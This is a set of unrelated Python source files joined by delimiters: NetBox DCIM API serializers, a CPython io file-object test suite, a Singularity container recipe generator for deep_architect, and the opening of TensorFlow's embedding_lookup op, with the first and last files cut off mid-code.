'id', 'url', 'name', 'display_name', 'device_type', 'device_role', 'tenant', 'platform', 'serial',
'asset_tag', 'site', 'rack', 'position', 'face', 'parent_device', 'status', 'primary_ip', 'primary_ip4',
'primary_ip6', 'cluster', 'virtual_chassis', 'vc_position', 'vc_priority', 'comments', 'local_context_data',
'tags', 'custom_fields', 'config_context', 'created', 'last_updated',
]
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_config_context(self, obj):
return obj.get_config_context()
class DeviceNAPALMSerializer(serializers.Serializer):
method = serializers.DictField()
class ConsoleServerPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleserverport-detail')
device = NestedDeviceSerializer()
type = ChoiceField(
choices=ConsolePortTypeChoices,
allow_blank=True,
required=False
)
cable = NestedCableSerializer(read_only=True)
class Meta:
model = ConsoleServerPort
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'description', 'cable', 'cable_peer', 'cable_peer_type',
'connected_endpoint', 'connected_endpoint_type', 'connected_endpoint_reachable', 'tags',
]
class ConsolePortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleport-detail')
device = NestedDeviceSerializer()
type = ChoiceField(
choices=ConsolePortTypeChoices,
allow_blank=True,
required=False
)
cable = NestedCableSerializer(read_only=True)
class Meta:
model = ConsolePort
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'description', 'cable', 'cable_peer', 'cable_peer_type',
'connected_endpoint', 'connected_endpoint_type', 'connected_endpoint_reachable', 'tags',
]
class PowerOutletSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:poweroutlet-detail')
device = NestedDeviceSerializer()
type = ChoiceField(
choices=PowerOutletTypeChoices,
allow_blank=True,
required=False
)
power_port = NestedPowerPortSerializer(
required=False
)
feed_leg = ChoiceField(
choices=PowerOutletFeedLegChoices,
allow_blank=True,
required=False
)
cable = NestedCableSerializer(
read_only=True
)
class Meta:
model = PowerOutlet
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description', 'cable',
'cable_peer', 'cable_peer_type', 'connected_endpoint', 'connected_endpoint_type',
'connected_endpoint_reachable', 'tags',
]
class PowerPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerport-detail')
device = NestedDeviceSerializer()
type = ChoiceField(
choices=PowerPortTypeChoices,
allow_blank=True,
required=False
)
cable = NestedCableSerializer(read_only=True)
class Meta:
model = PowerPort
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description', 'cable',
'cable_peer', 'cable_peer_type', 'connected_endpoint', 'connected_endpoint_type',
'connected_endpoint_reachable', 'tags',
]
class InterfaceSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:interface-detail')
device = NestedDeviceSerializer()
type = ChoiceField(choices=InterfaceTypeChoices)
lag = NestedInterfaceSerializer(required=False, allow_null=True)
mode = ChoiceField(choices=InterfaceModeChoices, allow_blank=True, required=False)
untagged_vlan = NestedVLANSerializer(required=False, allow_null=True)
tagged_vlans = SerializedPKRelatedField(
queryset=VLAN.objects.all(),
serializer=NestedVLANSerializer,
required=False,
many=True
)
cable = NestedCableSerializer(read_only=True)
count_ipaddresses = serializers.IntegerField(read_only=True)
class Meta:
model = Interface
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'enabled', 'lag', 'mtu', 'mac_address', 'mgmt_only',
'description', 'mode', 'untagged_vlan', 'tagged_vlans', 'cable', 'cable_peer', 'cable_peer_type',
'connected_endpoint', 'connected_endpoint_type', 'connected_endpoint_reachable', 'tags',
'count_ipaddresses',
]
def validate(self, data):
# Validate many-to-many VLAN assignments
device = self.instance.device if self.instance else data.get('device')
for vlan in data.get('tagged_vlans', []):
if vlan.site not in [device.site, None]:
raise serializers.ValidationError({
'tagged_vlans': f"VLAN {vlan} must belong to the same site as the interface's parent device, or "
f"it must be global."
})
return super().validate(data)
class RearPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rearport-detail')
device = NestedDeviceSerializer()
type = ChoiceField(choices=PortTypeChoices)
cable = NestedCableSerializer(read_only=True)
class Meta:
model = RearPort
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'positions', 'description', 'cable', 'cable_peer',
'cable_peer_type', 'tags',
]
class FrontPortRearPortSerializer(WritableNestedSerializer):
"""
NestedRearPortSerializer but with parent device omitted (since front and rear ports must belong to same device)
"""
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rearport-detail')
class Meta:
model = RearPort
fields = ['id', 'url', 'name', 'label']
class FrontPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:frontport-detail')
device = NestedDeviceSerializer()
type = ChoiceField(choices=PortTypeChoices)
rear_port = FrontPortRearPortSerializer()
cable = NestedCableSerializer(read_only=True)
class Meta:
model = FrontPort
fields = [
'id', 'url', 'device', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description', 'cable',
'cable_peer', 'cable_peer_type', 'tags',
]
class DeviceBaySerializer(TaggedObjectSerializer, ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicebay-detail')
device = NestedDeviceSerializer()
installed_device = NestedDeviceSerializer(required=False, allow_null=True)
class Meta:
model = DeviceBay
fields = ['id', 'url', 'device', 'name', 'label', 'description', 'installed_device', 'tags']
#
# Inventory items
#
class InventoryItemSerializer(TaggedObjectSerializer, ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:inventoryitem-detail')
device = NestedDeviceSerializer()
# Provide a default value to satisfy UniqueTogetherValidator
parent = serializers.PrimaryKeyRelatedField(queryset=InventoryItem.objects.all(), allow_null=True, default=None)
manufacturer = NestedManufacturerSerializer(required=False, allow_null=True, default=None)
_depth = serializers.IntegerField(source='level', read_only=True)
class Meta:
model = InventoryItem
fields = [
'id', 'url', 'device', 'parent', 'name', 'label', 'manufacturer', 'part_id', 'serial', 'asset_tag',
'discovered', 'description', 'tags', '_depth',
]
#
# Cables
#
class CableSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:cable-detail')
termination_a_type = ContentTypeField(
queryset=ContentType.objects.filter(CABLE_TERMINATION_MODELS)
)
termination_b_type = ContentTypeField(
queryset=ContentType.objects.filter(CABLE_TERMINATION_MODELS)
)
termination_a = serializers.SerializerMethodField(read_only=True)
termination_b = serializers.SerializerMethodField(read_only=True)
status = ChoiceField(choices=CableStatusChoices, required=False)
length_unit = ChoiceField(choices=CableLengthUnitChoices, allow_blank=True, required=False)
class Meta:
model = Cable
fields = [
'id', 'url', 'termination_a_type', 'termination_a_id', 'termination_a', 'termination_b_type',
'termination_b_id', 'termination_b', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
'custom_fields',
]
def _get_termination(self, obj, side):
"""
Serialize a nested representation of a termination.
"""
if side.lower() not in ['a', 'b']:
raise ValueError("Termination side must be either A or B.")
termination = getattr(obj, 'termination_{}'.format(side.lower()))
if termination is None:
return None
serializer = get_serializer_for_model(termination, prefix='Nested')
context = {'request': self.context['request']}
data = serializer(termination, context=context).data
return data
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_termination_a(self, obj):
return self._get_termination(obj, 'a')
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_termination_b(self, obj):
return self._get_termination(obj, 'b')
class TracedCableSerializer(serializers.ModelSerializer):
"""
Used only while tracing a cable path.
"""
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:cable-detail')
class Meta:
model = Cable
fields = [
'id', 'url', 'type', 'status', 'label', 'color', 'length', 'length_unit',
]
class CablePathSerializer(serializers.ModelSerializer):
origin_type = ContentTypeField(read_only=True)
origin = serializers.SerializerMethodField(read_only=True)
destination_type = ContentTypeField(read_only=True)
destination = serializers.SerializerMethodField(read_only=True)
path = serializers.SerializerMethodField(read_only=True)
class Meta:
model = CablePath
fields = [
'id', 'origin_type', 'origin', 'destination_type', 'destination', 'path', 'is_active', 'is_split',
]
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_origin(self, obj):
"""
Return the appropriate serializer for the origin.
"""
serializer = get_serializer_for_model(obj.origin, prefix='Nested')
context = {'request': self.context['request']}
return serializer(obj.origin, context=context).data
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_destination(self, obj):
"""
Return the appropriate serializer for the destination, if any.
"""
if obj.destination_id is not None:
serializer = get_serializer_for_model(obj.destination, prefix='Nested')
context = {'request': self.context['request']}
return serializer(obj.destination, context=context).data
return None
@swagger_serializer_method(serializer_or_field=serializers.ListField)
def get_path(self, obj):
ret = []
for node in obj.get_path():
serializer = get_serializer_for_model(node, prefix='Nested')
context = {'request': self.context['request']}
ret.append(serializer(node, context=context).data)
return ret
#
# Interface connections
#
class InterfaceConnectionSerializer(ValidatedModelSerializer):
interface_a = serializers.SerializerMethodField()
interface_b = NestedInterfaceSerializer(source='_path.destination')
connected_endpoint_reachable = serializers.SerializerMethodField(read_only=True)
class Meta:
model = Interface
fields = ['interface_a', 'interface_b', 'connected_endpoint_reachable']
@swagger_serializer_method(serializer_or_field=NestedInterfaceSerializer)
def get_interface_a(self, obj):
context = {'request': self.context['request']}
return NestedInterfaceSerializer(instance=obj, context=context).data
@swagger_serializer_method(serializer_or_field=serializers.BooleanField)
def get_connected_endpoint_reachable(self, obj):
if obj._path is not None:
return obj._path.is_active
return None
#
# Virtual chassis
#
class VirtualChassisSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:virtualchassis-detail')
master = NestedDeviceSerializer(required=False)
member_count = serializers.IntegerField(read_only=True)
class Meta:
model = VirtualChassis
fields = ['id', 'url', 'name', 'domain', 'master', 'tags', 'custom_fields', 'member_count']
#
# Power panels
#
class PowerPanelSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerpanel-detail')
site = NestedSiteSerializer()
rack_group = NestedRackGroupSerializer(
required=False,
allow_null=True,
default=None
)
powerfeed_count = serializers.IntegerField(read_only=True)
class Meta:
model = PowerPanel
fields = ['id', 'url', 'site', 'rack_group', 'name', 'tags', 'custom_fields', 'powerfeed_count']
class PowerFeedSerializer(
TaggedObjectSerializer,
CableTerminationSerializer,
ConnectedEndpointSerializer,
CustomFieldModelSerializer
):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerfeed-detail')
power_panel = NestedPowerPanelSerializer()
rack = NestedRackSerializer(
required=False,
allow_null=True,
default=None
)
type = ChoiceField(
choices=PowerFeedTypeChoices,
default=PowerFeedTypeChoices.TYPE_PRIMARY
)
status = ChoiceField(
choices=PowerFeedStatusChoices,
default=PowerFeedStatusChoices.STATUS_ACTIVE
)
supply = ChoiceField(
choices=PowerFeedSupplyChoices,
default=PowerFeedSupplyChoices.SUPPLY_AC
)
phase = ChoiceField(
choices=PowerFeedPhaseChoices,
default=PowerFeedPhaseChoices.PHASE_SINGLE
)
cable = NestedCableSerializer(read_only=True)
class Meta:
model = PowerFeed
fields = [
'id', 'url', 'power_panel', 'rack', 'name', 'status', 'type', 'supply', 'phase', 'voltage', 'amperage',
'max_utilization', 'comments', 'cable', 'cable_peer', 'cable_peer_type', 'connected_endpoint',
'connected_endpoint_type', 'connected_endpoint_reachable', 'tags', 'custom_fields', 'created',
'last_updated',
]
| |
# NOTE: this file tests the new `io` library backported from Python 3.x.
# Similar tests for the builtin file object can be found in test_file2k.py.
from __future__ import print_function
import sys
import os
import unittest
from array import array
from weakref import proxy
import io
import _pyio as pyio
from test.test_support import TESTFN, run_unittest
from UserList import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = self.open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write(b'teststring')
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
def testReadinto(self):
# verify readinto
self.f.write(b'12')
self.f.close()
a = array('b', b'x'*10)
self.f = self.open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEqual(b'12', a.tostring()[:n])
def testReadinto_text(self):
# verify readinto refuses text files
a = array('b', b'x'*10)
self.f.close()
self.f = self.open(TESTFN, 'r')
if hasattr(self.f, "readinto"):
self.assertRaises(TypeError, self.f.readinto, a)
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList([b'1', b'2'])
self.f.writelines(l)
self.f.close()
self.f = self.open(TESTFN, 'rb')
buf = self.f.read()
self.assertEqual(buf, b'12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1,2,3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
def testErrors(self):
f = self.f
self.assertEqual(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
if hasattr(f, "readinto"):
self.assertRaises((IOError, TypeError), f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = [('fileno', ()),
('flush', ()),
('isatty', ()),
('next', ()),
('read', ()),
('write', (b"",)),
('readline', ()),
('readlines', ()),
('seek', (0,)),
('tell', ()),
('write', (b"",)),
('writelines', ([],)),
('__iter__', ()),
]
if not sys.platform.startswith('atheos'):
methods.append(('truncate', ()))
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname, args in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises(ValueError, method, *args)
# file is closed, __exit__ shouldn't do anything
self.assertEqual(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEqual(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
class CAutoFileTests(AutoFileTests):
open = io.open
class PyAutoFileTests(AutoFileTests):
open = staticmethod(pyio.open)
class OtherFileTests(unittest.TestCase):
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
f = self.open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = self.open(TESTFN, bad_mode)
except ValueError as msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may be
# no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
f = self.open(TESTFN, 'wb', s)
f.write(str(s).encode("ascii"))
f.close()
f.close()
f = self.open(TESTFN, 'rb', s)
d = int(f.read().decode("ascii"))
f.close()
f.close()
except IOError as msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEqual(d, s)
def testTruncateOnWindows(self):
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
os.unlink(TESTFN)
f = self.open(TESTFN, 'wb')
try:
f.write(b'12345678901') # 11 bytes
f.close()
f = self.open(TESTFN,'rb+')
data = f.read(5)
if data != b'12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
finally:
f.close()
os.unlink(TESTFN)
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods.
dataoffset = 16384
filler = b"ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
b"spam, spam and eggs\n",
b"eggs, spam, ham and spam\n",
b"saussages, spam, spam and eggs\n",
b"spam, ham, spam and eggs\n",
b"spam, spam, spam, spam, spam, ham, spam\n",
b"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("b", b" "*100),))]
try:
# Prepare the testfile
bag = self.open(TESTFN, "wb")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
f = self.open(TESTFN, 'rb')
if next(f) != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
meth(*args) # This simply shouldn't fail
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
f = self.open(TESTFN, 'rb')
for i in range(nchunks):
next(f)
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("b", b"\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
f = self.open(TESTFN, 'rb')
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
class COtherFileTests(OtherFileTests):
open = io.open
class PyOtherFileTests(OtherFileTests):
open = staticmethod(pyio.open)
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(CAutoFileTests, PyAutoFileTests,
COtherFileTests, PyOtherFileTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
| |
import subprocess
import os
### Auxiliary functions.
def run_bash_command(cmd):
str_output = subprocess.check_output(cmd, shell=True)
return str_output
def write_textfile(filepath, lines, append=False, with_newline=True):
mode = 'a' if append else 'w'
with open(filepath, mode) as f:
for line in lines:
f.write(line)
if with_newline:
f.write("\n")
def file_exists(path):
return os.path.isfile(path)
def folder_exists(path):
return os.path.isdir(path)
def path_prefix(path):
return os.path.split(path)[0]
def create_folder(folderpath, abort_if_exists=True,
create_parent_folders=False):
assert not file_exists(folderpath)
assert create_parent_folders or folder_exists(path_prefix(folderpath))
assert not (abort_if_exists and folder_exists(folderpath))
if not folder_exists(folderpath):
os.makedirs(folderpath)
def join_paths(paths):
return os.path.join(*paths)
def create_bash_script(cmd_lines, filepath):
script_lines = ['#!/bin/bash'] + cmd_lines
write_textfile(filepath, script_lines)
run_bash_command('chmod +x %s' % filepath)
### Configurations for building the containers.
def get_key(is_py27, is_gpu):
return ('py27' if is_py27 else 'py36', 'gpu' if is_gpu else 'cpu')
def get_config(is_py27, is_gpu):
"""Gets the config dictionary associated to the type of container to be built.
"""
config_d = {
('py27', 'cpu'): {
'key': ('py27', 'cpu'),
'tag': 'all-py27-cpu',
'extra_py_packages': [],
'extra_apt_packages': ['python-tk'],
'extra_bash_commands': [],
},
('py27', 'gpu'): {
'key': ('py27', 'gpu'),
'tag': 'all-py27',
'extra_py_packages': [],
'extra_apt_packages': ['python-tk'],
'extra_bash_commands': [],
},
('py36', 'cpu'): {
'key': ('py36', 'cpu'),
'tag': 'all-py36-cpu',
'extra_py_packages': [],
'extra_apt_packages': ['python3-tk', 'libopenmpi-dev'],
'extra_bash_commands': [],
},
('py36', 'gpu'): {
'key': ('py36', 'gpu'),
'tag': 'all-py36',
'extra_py_packages': [],
'extra_apt_packages': ['python3-tk', 'libopenmpi-dev'],
'extra_bash_commands': [],
}
}
key = ('py27' if is_py27 else 'py36', 'gpu' if is_gpu else 'cpu')
return key, config_d[key]
extra_py_packages = [
# for documentation.
'sphinx',
'sphinx_rtd_theme',
# # for dash visualizations (update later).
# 'dash==0.21.0',
# 'dash-renderer==0.12.1',
# 'dash-html-components==0.10.0',
# 'dash-core-components==0.22.1',
# 'plotly --upgrade',
# for multi-machine support.
'mpi4py',
]
### NOTE: this is not fully tested
extra_bash_commands = [
# 'apt-get update'
# # for one of max's examples ; this is not fully tested.
# '$PIP_INSTALL pathlib tqdm tables',
# '$APT_INSTALL software-properties-common',
# 'add-apt-repository ppa:ubuntugis/ppa',
# 'apt-get update',
# '$APT_INSTALL gdal-bin libgdal-dev',
# '$PIP_INSTALL shapely[vectorized] rasterio',
]
extra_apt_packages = [
'pandoc'
# 'software-properties-common'
]
def create_singularity_container(config_d, out_folderpath):
header_lines = [
'Bootstrap: docker',
'From: docker://ufoym/deepo:%s' % config_d['tag'],
]
help_lines = [
'%help',
'This container contains the development environment for deep_architect.',
'You should be able to run all the examples, generate documentation,',
'and generate visualizations with it.',
]
post_lines = [
'%post',
' PIP_INSTALL="python -m pip --no-cache-dir install --upgrade"',
' APT_INSTALL="apt-get install -y --no-install-recommends"',
' apt-get update'
]
if config_d["key"][1] == 'gpu':
# necessary for the --nv flag in some cases.
post_lines.append(' echo > /bin/nvidia-smi')
for cmd in extra_bash_commands + config_d['extra_bash_commands']:
post_lines.append(' %s' % cmd)
for pkg in extra_apt_packages + config_d['extra_apt_packages']:
post_lines.append(' $APT_INSTALL %s' % pkg)
for pkg in extra_py_packages + config_d['extra_py_packages']:
post_lines.append(' $PIP_INSTALL %s' % pkg)
post_lines.extend([
# cleanup lines
' ldconfig && \\',
' apt-get clean && \\',
' apt-get autoremove && \\',
' rm -rf /var/lib/apt/lists/* /tmp/* ~/*',
])
runscript_lines = [
'%runscript',
' export PYTHONPATH=".:$PYTHONPATH" && exec python "$@"'
]
lines = []
for lst in [header_lines, help_lines, post_lines, runscript_lines]:
lines.extend(lst)
lines.append('')
recipe_filepath = join_paths([out_folderpath, 'Singularity'])
write_textfile(recipe_filepath, lines)
# script for creating the container.
container_filepath = join_paths([out_folderpath, 'deep_architect.img'])
create_bash_script([
'sudo singularity build --sandbox %s %s' %
(container_filepath, recipe_filepath)
], join_paths([out_folderpath, 'build.sh']))
# TODO: create the equivalent docker containers.
def create_docker_container(config_d, recipe_filepath):
raise NotImplementedError
# TODO: change to a make file later.
def create_build_all_script(out_folderpath, folderpath_lst):
create_bash_script(['./%s/build.sh' % path for path in folderpath_lst],
join_paths([out_folderpath, 'build.sh']))
def create_makefile(out_folderpath, container_config_lst):
fn = lambda rule_name: {
'rule_name': rule_name,
'target_lst': [],
'command_lst': []
}
rule_name_to_config = {
'py27': fn('py27'),
'py36': fn('py36'),
'cpu': fn('cpu'),
'gpu': fn('gpu'),
'all': fn('all')
}
def add_to_lists(cfg):
lst = [rule_name_to_config['all']]
lst.append(rule_name_to_config['py27' if cfg['is_py27'] else 'py36'])
lst.append(rule_name_to_config['gpu' if cfg['is_gpu'] else 'cpu'])
for x in lst:
x['target_lst'].append(cfg['target'])
x['command_lst'].append(cfg['command'])
for cfg in container_config_lst:
assert cfg['is_singularity'] # only for singularity for now.
cfg['target'] = join_paths([cfg['folderpath'], 'deep_architect.img'])
cfg['command'] = join_paths(
['./%s' % join_paths([cfg['folderpath'], 'build.sh'])])
add_to_lists(cfg)
# create scripts for all commands.
for k, d in rule_name_to_config.items():
create_bash_script(d['command_lst'],
join_paths([out_folderpath,
'build_%s.sh' % k]))
create_bash_script(
['rm %s' % t for t in rule_name_to_config['all']['target_lst']],
join_paths([out_folderpath, 'clean.sh']))
def main():
container_folderpath_lst = []
container_config_lst = []
for is_py27 in [False, True]:
for is_gpu in [False, True]:
key, config_d = get_config(is_py27, is_gpu)
out_folderpath = join_paths([
'containers', 'singularity',
'-'.join(['deep_architect'] + list(key))
])
create_folder(
out_folderpath,
abort_if_exists=False,
create_parent_folders=True)
create_singularity_container(config_d, out_folderpath)
container_folderpath_lst.append(out_folderpath)
container_config_lst.append({
'folderpath': out_folderpath,
'is_singularity': True,
'is_py27': is_py27,
'is_gpu': is_gpu
})
create_build_all_script('containers', container_folderpath_lst)
create_makefile('containers', container_config_lst)
if __name__ == '__main__':
main()
# TODO: do the generation of the Docker containers. Should be similar to the singularity ones.
# TODO: add a file to create all the containers at once.
# NOTE: the makefile is not fully correct.
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for embeddings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
def embedding_lookup(params, ids, partition_strategy="mod", name=None,
validate_indices=True):
"""Looks up `ids` in a list of embedding tensors.
This function is used to perform parallel lookups on the list of
tensors in `params`. It is a generalization of
[`tf.gather()`](../../api_docs/python/array_ops.md#gather), where `params` is
interpreted as a partition of a larger embedding tensor.
If `len(params) > 1`, each element `id` of `ids` is partitioned between
the elements of `params` according to the `partition_strategy`.
In all strategies, if the id space does not evenly divide the number of
partitions, each of the first `(max_id + 1) % len(params)` partitions will
be assigned one more id.
If `partition_strategy` is `"mod"`, we assign each id to partition
`p = id % len(params)`. For instance,
13 ids are split across 5 partitions as:
`[[0, 5, 10], [1, 6, 11], [2, 7, 12], [3, 8], [4, 9]]`
If `partition_strategy` is `"div"`, we assign ids to partitions in a
contiguous manner. In this case, 13 ids are split across 5 partitions as:
`[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10], [11, 12]]`
The results of the lookup are concatenated into a dense
tensor. The returned tensor has shape `shape(ids) + shape(params)[1:]`.
Args:
params: A list of tensors with the same type and which can be concatenated
along dimension 0. Each `Tensor` must be appropriately sized for the given
`partition_strategy`.
ids: A `Tensor` with type `int32` or `int64` containing the ids to be looked
up in `params`.
partition_strategy: A string specifying the partitioning strategy, relevant
if `len(params) > 1`. Currently `"div"` and `"mod"` are supported. Default
is `"mod"`.
name: A name for the operation (optional).
validate_indices: Whether or not to validate gather indices.
Returns:
A `Tensor` with the same type as the tensors in `params`.
Raises:
ValueError: If `params` is empty.
"""
if params is None or params == []: # pylint: disable=g-explicit-bool-comparison
raise ValueError("Need at least one param")
if not isinstance(params, list):
params = [params]
with ops.op_scope(params + [ids], name, "embedding_lookup") as name:
np = len(params) # Number of partitions
params = ops.convert_n_to_tensor_or_indexed_slices(params, name="params")
if np == 1:
with ops.colocate_with(params[0]):
return array_ops.gather(params[0], ids, name=name,
validate_indices=validate_indices)
else:
ids = ops.convert_to_tensor(ids, name="ids")
flat_ids = array_ops.reshape(ids, [-1])
original_indices = math_ops.range(array_ops.size(flat_ids))
# Create p_assignments and set new_ids depending on the strategy.
if partition_strategy == "mod":
p_assignments = flat_ids % np
new_ids = flat_ids // np
elif partition_strategy == "div":
# Compute num_total_ids as the sum of dim-0 of params, then assign to
# partitions based on a constant number of ids per partition. Optimize
# if we already know the full shape statically.
dim_0_size = params[0].get_shape()[0]
for p in xrange(1, np):
dim_0_size += params[p].get_shape()[0]
if dim_0_size.value:
num_total_ids = constant_op.constant(dim_0_size.value, flat_ids.dtype)
else:
dim_0_sizes = []
for p in xrange(np):
if params[p].get_shape()[0].value is not None:
dim_0_sizes.append(params[p].get_shape()[0].value)
else:
with ops.colocate_with(params[p]):
dim_0_sizes.append(array_ops.shape(params[p])[0])
num_total_ids = math_ops.reduce_sum(
math_ops.cast(array_ops.pack(dim_0_sizes), flat_ids.dtype))
ids_per_partition = num_total_ids // np
extras = num_total_ids % np
p_assignments = math_ops.maximum(
flat_ids // (ids_per_partition + 1),
(flat_ids - extras) // ids_per_partition)
# Emulate a conditional using a boolean indicator tensor
